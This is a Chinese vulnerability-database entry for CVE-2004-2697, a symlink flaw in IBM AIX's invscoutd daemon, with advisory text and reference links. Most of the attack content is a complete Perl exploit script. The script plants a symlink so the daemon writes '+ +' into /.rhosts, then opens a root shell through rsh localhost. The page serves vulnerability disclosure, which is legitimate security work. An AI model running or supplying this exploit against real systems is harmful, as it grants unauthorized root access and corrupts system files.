AIX Invscoutd符号连接漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107359 漏洞类型 竞争条件
发布时间 2003-05-29 更新时间 2007-10-09
CVE编号 CVE-2004-2697 CNNVD-ID CNNVD-200412-422
漏洞平台 AIX CVSS评分 6.9
|漏洞来源
https://www.exploit-db.com/exploits/23883
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-422
|漏洞详情
IBMAIX是一款商业性质UNIX操作系统。AIXinvscoutd不安全建立临时文件,本地攻击者可以利用这个漏洞提升权限。AIXinvscoutd由于设计错误,允许用户指定一个日志文件来写入数据,恶意用户可以建议一个指向本地系统文件的符号连接,当运行invscoutd写入日志信息时,可破坏指向的本地文件,造成本地拒绝服务,或权限提升。
|漏洞EXP
source: http://www.securityfocus.com/bid/9982/info

Reportedly AIX invscoutd insecurely handles temporary files; this may allow a local attacker to destroy data on vulnerable system. This issue is due to a design error that allows a user to specify a log file that the process writes to while holding escalated privileges.

This issue may allow a malicious user to corrupt arbitrary files on the affected system, potentially leading to a system wide denial of service condition. It has also been conjectured that this issue may be leveraged to allow an attacker to gain escalated privileges, although this is unconfirmed.

#!/usr/bin/perl
# FileName: x_invscoutd.pl
# Exploit invscoutd of Aix4.x & 5L to get a uid=0 shell.
# Tested  : on Aix4.3.3 & Aix5.1. 
#           Some high version of invscoutd is not affected.
# Author  : watercloud@xfocus.org
# Site    : www.xfocus.org   www.xfocus.net
# Date    : 2003-5-29
# Announce: use as your owner risk!

$LOG="/tmp/.ex/.hello\n+ +\nworld";
$CMD="/usr/sbin/invscoutd";
umask 022;
mkdir "/tmp/.ex",0777;

print "Exploit error on kill process invscoutd !!" ,exit 1
  if &killproc() == 0;

symlink "/.rhosts",$LOG;
system $CMD,"-p7321",$LOG; &killproc();
unlink $LOG;
print "\n============\nRemember to remove /.rhosts !!\n";
print "rsh localhost -l root '/bin/sh -i'\n";
print "waiting . . . . . .\n";
system "rsh","localhost","-l","root","/bin/sh -i";

system $CMD,"-p808","/dev/null" ; &killproc();
rmdir "/tmp/.ex";

sub killproc() {
  $_=`ps -ef |grep invscoutd |grep -v grep |grep -v perl`;
  @proc_lst=split;
  $ret=kill 9,$proc_lst[1] if $proc_lst[1];
  $ret=-1 if ! defined $ret;
  return $ret;
}
#EOF
|参考资料

来源:XF
名称:aix-invscoutd-gain-privileges(15620)
链接:http://xforce.iss.net/xforce/xfdb/15620
来源:www.xfocus.org
链接:http://www.xfocus.org/exploits/200403/31.html
来源:BID
名称:9982
链接:http://www.securityfocus.com/bid/9982
来源:www.securiteam.com
链接:http://www.securiteam.com/exploits/5CP0F0UDFG.html
来源:OSVDB
名称:4582
链接:http://www.osvdb.org/4582
来源:SECUNIA
名称:11200
链接:http://secunia.com/advisories/11200
来源:NSFOCUS
名称:6236
链接:http://www.nsfocus.net/vulndb/6236